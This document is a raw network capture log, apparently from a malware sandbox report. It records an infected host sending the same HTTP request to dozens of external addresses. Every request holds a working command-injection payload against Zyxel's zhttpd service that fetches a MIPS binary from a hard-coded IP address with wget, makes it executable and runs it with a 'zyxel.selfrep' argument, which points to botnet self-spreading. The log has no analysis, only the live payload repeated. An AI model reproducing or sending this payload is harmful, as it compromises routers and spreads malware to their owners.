                                      Jan 14, 2024 15:51:01.651808023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8281192.168.2.145143025.186.186.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651858091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8282192.168.2.145068018.80.123.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651910067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8283192.168.2.144465284.248.35.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651937962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8284192.168.2.145870023.27.180.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651973963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8285192.168.2.145490643.220.160.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.652000904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8286192.168.2.1448926116.12.91.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.652033091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8287192.168.2.14598808.247.89.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.652064085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8288192.168.2.1440822167.230.239.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659101009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8289192.168.2.144966463.33.241.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659146070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8290192.168.2.14488889.229.209.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659205914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8291192.168.2.1445308154.209.219.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659235001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8292192.168.2.1460900107.228.97.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659284115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8293192.168.2.144115665.82.18.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659348011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8294192.168.2.1439352184.240.227.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659384966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8295192.168.2.143676042.113.92.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659425974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8296192.168.2.1436712131.40.236.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659454107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8297192.168.2.143692812.126.7.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659476995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8298192.168.2.1443432176.132.114.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659518003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8299192.168.2.145150018.56.83.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659548998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8300192.168.2.143280071.197.89.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659609079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8301192.168.2.1432882153.89.115.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659622908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8302192.168.2.144134464.189.141.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659660101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8303192.168.2.1434986167.150.90.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659722090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8304192.168.2.144814841.249.89.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659775972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8305192.168.2.143893865.190.171.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659809113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8306192.168.2.1444630221.219.125.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659835100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8307192.168.2.1440722162.212.126.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659874916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8308192.168.2.1438480113.20.199.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659923077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8309192.168.2.145955853.16.35.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.659951925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8310192.168.2.145405266.106.169.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660002947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8311192.168.2.1434806220.240.104.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660065889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8312192.168.2.1438512163.30.221.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660098076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8313192.168.2.1452866188.230.153.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660135031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8314192.168.2.1439724107.69.106.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660187006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8315192.168.2.145798453.122.62.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660238981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8316192.168.2.1452834176.51.85.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660279036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8317192.168.2.143472619.126.236.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660336018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8318192.168.2.145070899.147.208.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660372972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8319192.168.2.1433732146.161.36.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660412073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8320192.168.2.145308832.88.99.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660454988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8321192.168.2.145223027.43.145.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660490990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8322192.168.2.1451222196.136.4.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660554886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8323192.168.2.1435348166.202.72.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660609961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8324192.168.2.144463864.119.41.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660640001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8325192.168.2.1439834130.25.226.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660669088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8326192.168.2.1438616153.201.218.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660732985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8327192.168.2.143580879.44.47.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660773039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8328192.168.2.1443164113.89.56.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660800934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8329192.168.2.146039875.196.244.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660845041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8330192.168.2.1447566140.194.54.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660875082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8331192.168.2.1434992183.141.231.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660907984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8332192.168.2.1445018157.143.234.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.660972118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8333192.168.2.143428653.99.87.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661022902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8334192.168.2.143969680.173.121.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661039114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8335192.168.2.1453938169.18.64.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661050081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8336192.168.2.143931450.63.25.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661089897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8337192.168.2.1433334181.198.235.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661129951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8338192.168.2.1440218110.5.212.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661187887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8339192.168.2.1440872121.12.128.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661216021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8340192.168.2.1459186112.155.14.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661262989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8341192.168.2.1443980223.20.101.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661303997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8342192.168.2.1459426221.137.98.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.661345959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8343192.168.2.1447496130.198.110.161443
                                      TimestampBytes transferredDirectionData
